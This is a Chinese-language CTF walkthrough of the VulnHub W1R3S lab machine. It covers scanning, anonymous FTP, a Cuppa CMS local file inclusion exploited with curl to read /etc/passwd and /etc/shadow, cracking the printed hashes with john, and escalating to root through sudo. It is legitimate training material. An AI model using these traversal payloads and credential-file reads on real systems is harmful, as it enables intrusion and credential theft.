首页 > 其他分享 >vulnhub - w1r3s.v1.0.1

vulnhub - w1r3s.v1.0.1

时间:2024-05-17 21:30:11浏览次数:22  
标签:99999 bin 17379 false v1.0 vulnhub var w1r3s usr

vulnhub - w1r3s.v1.0.1

高质量视频教程 - b站红队笔记

靶机下载

本地环境

本机ip:192.168.157.131

w1r3s虚拟机设置NAT模式

信息收集

扫描网段得到攻击机ip:192.168.157.158

image-20240516203929654

详细信息扫描

nmap -A -p- 192.168.157.158

image-20240516204423055

开放了四个端口

21 FTP协议(可匿名登录访问)
22 SSH
80 http
3306 mysql

FTP匿名登录访问

目录结构与账户已通过nmap获取

| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees

用户名Anonymous,空密码

image-20240517142438944

在content目录下发现txt文件,下载到本机上查看

prompt	#省去交互式确认
mget *.txt	#下载所有txt文件

image-20240517142843446

02.txt内密文是MD5与base64

image-20240517143759219

It is easy, but not that easy..

docs/worktodo.txt得到

	ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ

new-employees/employee-names.txt得到员工信息

The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

网站扫描

dirsearch -u 192.168.157.158

image-20240517165852449

主要关注/administrator/wordpress

访问http://192.168.157.158/administrator/installation/

image-20240517170221746

由网页标签得知是Cuppa CMS系统

LFI漏洞

使用searchsploit查找漏洞

searchsploit cuppa CMS
searchsploit -m  php/webapps/25971.txt	#下载到当前目录下

image-20240517171619650

阅读一下得知是LFI漏洞,攻击者可利用此漏洞包含本地或远程PHP文件或读取非PHP文件

/alerts/alertConfigField.php文件urlConfig参数存在LFI漏洞,可以利用特殊的url,查看本地文件

利用curl来查看

curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.157.158/administrator/alerts/alertConfigField.php

--data-urlencode 选项会对键值对中的特殊字符进行 URL 编码

主要用于对 POST 请求中的数据进行 URL 编码

得到以下数据

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false

x/etc/passwd 文件中通常表示密码字段已经被哈希加密,实际的密码存储在 /etc/shadow 文件中。在过去的 Unix 系统中,/etc/passwd 文件存储用户账户信息,包括用户名和密码字段。然而,为了增加密码的安全性,现代的 Unix 系统通常将用户密码从 /etc/passwd 文件中移出,单独存储在 /etc/shadow 文件中,而在 /etc/passwd 中使用占位符代表密码字段。

所以现在去读取 /etc/shadow

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::

有了hash自然先去尝试john爆破

john爆破

取出有hash值的用户,另存为shadow.hash

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

image-20240517174554639

ssh登入w1r3s用户,尝试提权

image-20240517174726577

根据提示,用户 w1r3s 在主机 W1R3S.localdomain 上具有完全的 sudo 权限,可以以任何身份运行任何命令。

sudo /bin/bash

image-20240517175209153

提权成功,在/root下拿到flag

image-20240517175334722

笔记

写于自己打完全程后,观看红队笔记的讲解视频,记录下一些细节性的技巧与思路

nmap -sT --min-rate 10000 -p- 192.168.157.158 -oA nmapscan/ports
  • -sT:指定使用 TCP 连接进行端口扫描。TCP 扫描是 nmap 的默认扫描类型。
  • --min-rate 10000:设置最小扫描速率为 10000 packets/sec(数据包/秒)。这将控制 nmap 发送扫描请求的速度。
  • -p-:指定扫描所有端口。-p- 表示扫描范围为从端口 1 到 65535 的所有端口。
  • -oA nmapscan/ports:指定输出文件的前缀为 nmapscan/ports。这将生成三个文件,包括一个文本文件(.txt)、一个 XML 文件(.xml)和一个 Nmap 脚本引擎文件(.nmap),用于存储扫描结果。

整体效果:该命令将使用 nmap 工具执行 TCP 端口扫描,扫描范围为目标主机的所有端口,扫描速率为每秒 10000 个数据包。扫描结果将被保存为文本、XML 和 Nmap 脚本引擎文件,并存储在名为 nmapscan/ports 的目录中

tips:在红队行动中--min-rate速率要尽量慢

image-20240517200326666

筛选

当扫描结果中开放的端口较多时,可用以下方法筛选

grep open nmapscan/ports.nmap
grep open nmapscan/ports.nmap | awk -F '/' '{print $1}'
  • grep open nmapscan/ports.nmap:使用 grep 命令在 nmapscan/ports.nmap 文件中查找包含 "open" 的行。grep 是一个文本搜索工具,用于在文件中查找匹配指定模式的行。
  • |:管道符号,将前一个命令的输出作为后一个命令的输入。
  • awk -F '/' '{print $1}':使用 awk 命令对前一个命令的输出进行处理。awk 是一种文本处理工具,它按照指定的字段分隔符来解析输入,并对每行进行处理。
    • -F '/':指定字段分隔符为 /,这样每行就会被分成多个字段。
    • '{print $1}':打印每行的第一个字段。在这个命令中,我们使用 / 作为字段分隔符,因此 $1 表示每行的第一个字段,即端口号。

整体效果:该命道的作用是在 nmapscan/ports.nmap 文件中查找包含 "open" 的行,并提取出这些行中的端口号。输出将只包含端口号,每个端口号占一行

若使端口号一行展示可用paste命令

┌──(root㉿kali)-[/home/kali/桌面]
└─# grep open nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ','
21,22,80,3306
  • paste 是一个命令行工具,用于将多个文件的内容进行列对齐,并输出到标准输出或指定的文件中。
  • -s 选项表示将多个文件的内容进行串联,而不是逐行对齐。也就是说,它将多个文件的内容连接成一行输出。
  • -d ',' 选项指定了列之间的分隔符为逗号(,)。这样,每个列之间将用逗号分隔。

将结果存入变量

ports=$(grep open nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',')

image-20240517201514875

ports=$(...):将整个命令的输出结果赋值给变量 ports

详细扫描

nmap -sT -sV -sC -O -p21,22,80,3306 192.168.157.158 -oA nmapscan/detail

输入-p$ports后按tab即可显示为-p21,22,80,3306

  • -sV:启用版本探测,用于尝试识别目标主机上运行的服务的版本信息。
  • -sC:启用默认脚本扫描,使用一组常用脚本来检测目标主机上的漏洞和安全问题。
  • -O:启用操作系统探测,尝试识别目标主机的操作系统类型。
  • -p21,22,80,3306:指定要扫描的端口列表,包括 21(FTP)、22(SSH)、80(HTTP)和 3306(MySQL)。

扫描UDP

nmap -sU --top-ports 20 192.168.157.158 -oA nmapscan/udp
  • -sU:指定使用 UDP 扫描模式。UDP 扫描用于探测目标主机上开放的 UDP 端口。
  • --top-ports 20:指定扫描的端口数目为 20。该参数会使 nmap 扫描目标主机上最常见的 20 个 UDP 端口。

关于ftp的小细节

登入后第一时间输入

ftp > binary	#切换到二进制模式

可以防止下载的二进制文件损坏

对于加密数据

使用工具hash-identifier识别

标签:99999,bin,17379,false,v1.0,vulnhub,var,w1r3s,usr
From: https://www.cnblogs.com/Mar10/p/18198741

相关文章

  • 13、LAMP SecurityCTF5(VulnHub)
    LAMPSecurityCTF5一、nmapcatports|grepopen|awk-F'/''{print$1}'|tr'\n'','catports|grepopen|awk-F'/''{print$1}'|paste-sd','>nmap_open_port_total.txt......
  • 密码管理器---KaPass v1.0.3
    伴随的网龄的增加,密码也随之增加,简单的密又怕不安全,复杂的密码怕记不住。就是在这样的情况下,KaPass密码管理器应运而生。一个密码管理器---KaPass,简洁的界面,功能齐全,一起了解一下KaPass: 1、登陆窗口2、主界面3、新增群组,可自定义群组图标4、新增密码,可以储存各式各样......
  • 14、pWnOS_v2.0(VulnHub)
    pWnOS_v2.0一、nmap靶机ip找不见的自行上网查找解决办法。二、web渗透目录爆破/blog/whatweb/search.php/register.phpqwe123qwe点击给定的链接兔子洞,无法登入?一直卡在这个界面wfuzz貌似没什么用nmap->目录SimplePHPBlog0.4.0perl1191.pl......
  • 重大更新!开源无代码 / 低代码平台 NocoBase v1.0 正式发布!
    NocoBase是一个极易扩展的开源无代码开发平台。完全掌控,无限扩展,助力你的开发团队快速响应变化,显著降低成本,不必投入几年时间和数百万资金研发,只需要花几分钟部署NocoBase。NocoBase中文官网官方文档在线Demov1.0里程碑历时3年,NocoBase迎来第一次根版本号升级,版本号......
  • 39、BlackRose(VulnHub)
    BlackRose一、nmap二、web渗透随便看看注册进去账号:xxxxxx密码:xxxxxx目录爆破有很多特殊的目录,不过访问后都重定向了burpsuite改包进admin查看xxxxxx用户数据包抓一些xxxxxx用户的一些记录包,看看有什么可用的signature=&command=id&indexcsrf=3cb58993bfd71f......
  • 用“芯”服务,安安“芯芯” 经纬恒润功能安全软件库SAFETY BASE V1.0正式发布
        当前,半导体厂商在进行满足功能安全芯片开发时,除由其自身实现的安全机制以外,还会在安全手册(safetymanual)中提出大量需要被自主研发的OEM或Tire1实现的AOU(AssumptionofUse)假设性需求。然而,在项目开发过程中,经常面临无量产化的安全机制软件库和集成方案、成本高、安全......
  • 汉得PI&PO教材-Adapter使用-实例3 rfc2soap V1.0
    汉得PI&PO教材系列   Adapter使用-实例3:RFC2SOAP         仅限汉得内部使用 作者:张版本:1.0日期:2019-12-18图标 图标含义 警告 示例 注释 建议 语法 外部处理......
  • 汉得PI&PO教材-Adapter使用-实例4 proxy2proxy V1.0
    汉得PI&PO教材系列   Adapter使用-实例4:proxy2proxy         仅限汉得内部使用 作者:徐伟版本:1.0日期:2017-02-28图标 图标含义 警告 示例 注释 建议 语法 外部处......
  • 汉得PI&PO教材-Adapter使用-实例6 proxy2jdbc(异步)V1.0
    汉得PI&PO教材系列   汉得PI&PO教材-Adapter使用-实例6proxy2jdbc(异步)         仅限汉得内部使用 作者:汉得顾问版本:1.0日期:2017-02-01图标 图标含义 警告 示例 注释 建议......
  • 汉得PI&PO教材-Adapter使用-实例5 jdbc2jdbc(含存错过程)V1.0
    汉得PI&PO教材系列   Adapter使用-实例5jdbc2jdbc(含存错过程)         仅限汉得内部使用 作者:汉得顾问版本:1.0日期:2017-02-01图标 图标含义 警告 示例 注释 建议 语法......